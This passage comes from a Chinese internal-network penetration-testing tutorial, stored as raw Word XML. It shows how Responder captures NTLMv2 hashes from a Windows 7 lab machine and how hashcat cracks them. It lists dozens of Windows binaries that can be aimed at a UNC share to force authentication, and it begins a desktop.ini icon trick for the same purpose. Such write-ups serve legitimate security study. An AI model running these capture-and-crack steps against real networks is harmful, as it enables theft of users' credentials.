        <w:t>会话协议，由于</w:t>
      </w:r>
      <w:r>
        <w:t>NTLMv1</w:t>
      </w:r>
      <w:r>
        <w:t>也很脆弱，所以后来就有了</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM v2</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t>验证体系，目前</w:t>
      </w:r>
      <w:r>
        <w:t>winserver 2008</w:t>
      </w:r>
      <w:r>
        <w:t>及以后的</w:t>
      </w:r>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:t>版本默认均是使用</w:t>
      </w:r>
      <w:r>
        <w:t>NetNTLMv2</w:t>
      </w:r>
      <w:r>
        <w:t>的，默认使用</w:t>
      </w:r>
      <w:r>
        <w:t>NTLMv1</w:t>
      </w:r>
      <w:r>
        <w:t>的有</w:t>
      </w:r>
      <w:r>
        <w:t>2003</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>XP</w:t>
      </w:r>
      <w:r>
        <w:t>这些机器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> windows</w:t>
      </w:r>
      <w:r>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r>
        <w:t>认证的有</w:t>
      </w:r>
      <w:r>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:t>等，</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过模拟正常的</w:t>
      </w:r>
      <w:r>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>协议从而获得受害机器的</w:t>
      </w:r>
      <w:r>
        <w:t>NTLMV2 hash</w:t>
      </w:r>
      <w:r>
        <w:t>值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NTLM v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>不能直接应用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pass The Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击，只能通过暴力破解来获取明文密码。</w:t>
      </w:r>
      <w:r>
        <w:t>而攻击者获取</w:t>
      </w:r>
      <w:r>
        <w:t>NTLMv1 hash</w:t>
      </w:r>
      <w:r>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>可以直接还原出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NTLM HASH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>，这样的话就可以将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NTLM HASH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>直接用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pass The Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r>
        <w:t>，相较于</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM v2</w:t>
      </w:r>
      <w:r>
        <w:t>还需要破解才能利用更加不安全。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="header-n37"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值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本文以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自带的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为例，诚然，在内网渗透中是不可能直接在对方内网安插一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进去的，但是本文仅从技术可行性方面来写，故这里暂不考虑如何将工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>打入敌人内部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个问题，本次从技术可行性角度介绍了几种获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="header-n39"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一：通过命令获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并破解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既然原理已经清楚，现在就该实际测试一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的效果了，首先测试一下它的欺骗主机并获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NTLMV2 hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值的功能，在测试环境中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处于同一网段中。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测试环境：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 xml:space="preserve">kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（攻击机）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   172.24.54.72</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">windows 7 </w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>受害机</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 172.24.48.100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="003445E6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>中执行以下命令开启</w:t>
      </w:r>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>responder -I eth0 -rPv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>此时</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>已经开始工作，且</w:t>
      </w:r>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>新开放端口情况如下（需注意端口冲突情况）：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79826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039099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t>随后在</w:t>
      </w:r>
      <w:r>
        <w:t>windows7</w:t>
      </w:r>
      <w:r>
        <w:t>上尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t>net use</w:t>
      </w:r>
      <w:r>
        <w:t>访问一个不存在的主机名。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58067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14544056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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>可以看到，在受害机器输入命令后，</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>已经获取到了受害机器的</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM V2 hash</w:t>
      </w:r>
      <w:r>
        <w:t>值，由于</w:t>
      </w:r>
      <w:r>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>会尝试多次认证，所以会捕捉到多次</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>值，在</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>上获取到的</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>都会保存在</w:t>
      </w:r>
      <w:r>
        <w:t>/usr/share/responder/logs/</w:t>
      </w:r>
      <w:r>
        <w:t>文件夹下，且会根据</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>、协议进行命名。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23973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14542098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获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值之后，我们尝试使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自带的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对这段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行暴力破解，当然密码字典需要自己提供一下。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自带的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是一个破解密码的神器，可支持调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的破解速度是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>完全比不了的，破解密文类型多，支持各种加密算法，大家有兴趣可以了解下。这里就简单使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>破解该用户的密码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 5600 ./SMB-NTLMv2-SSP-172.24.48.100.txt ./top100.txt --force</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>指定密文类型，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>5600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>对应的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>NetNTLMv2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">./top100.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>为密码字典文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--force </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>为忽略警告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>可以看到已经爆出密码</w:t>
      </w:r>
      <w:r>
        <w:t>Passw0rd</w:t>
      </w:r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3158728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1917168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3445E6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>除了上边的</w:t>
      </w:r>
      <w:r>
        <w:t>net use</w:t>
      </w:r>
      <w:r>
        <w:t>之外，还有下列命令可以使</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>NTLV V2 hash</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a8"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">net.exe use \hostshare </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>attrib.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cacls.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">certreq.exe \hostshare #(noisy, pops an error dialog) </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>certutil.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cipher.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ClipUp.exe -l \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmdl32.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmstp.exe /s \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>colorcpl.exe \hostshare #(noisy, pops an error dialog)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>comp.exe /N=0 \hostshare \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>compact.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>control.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>convertvhd.exe -source \hostshare -destination \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Defrag.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>diskperf.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>dispdiag.exe -out \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>doskey.exe /MACROFILE=\hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>esentutl.exe /k \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>expand.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>extrac32.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>FileHistory.exe \hostshare #(noisy, pops a gui)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>findstr.exe * \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>fontview.exe \hostshare #(noisy, pops an error dialog)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>fvenotify.exe \hostshare #(noisy, pops an access denied error)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>FXSCOVER.exe \hostshare #(noisy, pops GUI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>hwrcomp.exe -check \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>hwrreg.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">icacls.exe \hostshare </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>licensingdiag.exe -cab \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>lodctr.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>lpksetup.exe /p \hostshare /s</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>makecab.exe \hostshare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msiexec.exe /update \hostshare /quiet</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msinfo32.exe \hostshare #(noisy, pops a "cannot open" dialog)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mspaint.exe \hostshare #(noisy, invalid path to png error)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msra.exe /openfile \hostshare #(noisy, error)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mstsc.exe \hostshare #(noisy, error)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">netcfg.exe -l \hostshare -c p -i foo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="header-n65"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>desktop.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash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>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的方式肯定越多越好，那么如何另辟蹊径呢？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我们可以通过图标资源来代替代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>net use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这条命令，比如我们可以创建一个文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，并在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下再创建一个文件夹如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，通过给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设置其他图标，能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件夹下生成一个隐藏的系统文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>desktop.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，而通过修改设置可以使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>desktop.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可见，最后编辑这个文件，将图标资源指向一个不存在的主机，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件夹之后即可获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值。</w:t>
      </w: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具体操作步骤如下，首先生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>desktop.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件（直接新建文件改后缀是没有用的）：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47192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135122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t>此时</w:t>
      </w:r>
      <w:r>
        <w:t>desktop.ini</w:t>
      </w:r>
      <w:r>
        <w:t>文件已生成，需要修改配置使</w:t>
      </w:r>
      <w:r>
        <w:t>desktop.ini</w:t>
      </w:r>
      <w:r>
        <w:t>文件可见：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358832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146342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lastRenderedPageBreak/>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:t>test2</w:t>
      </w:r>
      <w:r>
        <w:t>文件夹修改</w:t>
      </w:r>
      <w:r>
        <w:t>desktop.ini</w:t>
      </w:r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08318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1385386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将上图中原本的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IconResource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>路径修改，改为如下格式后保存即可（制作完成后可以打开试试，要是卡住就说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
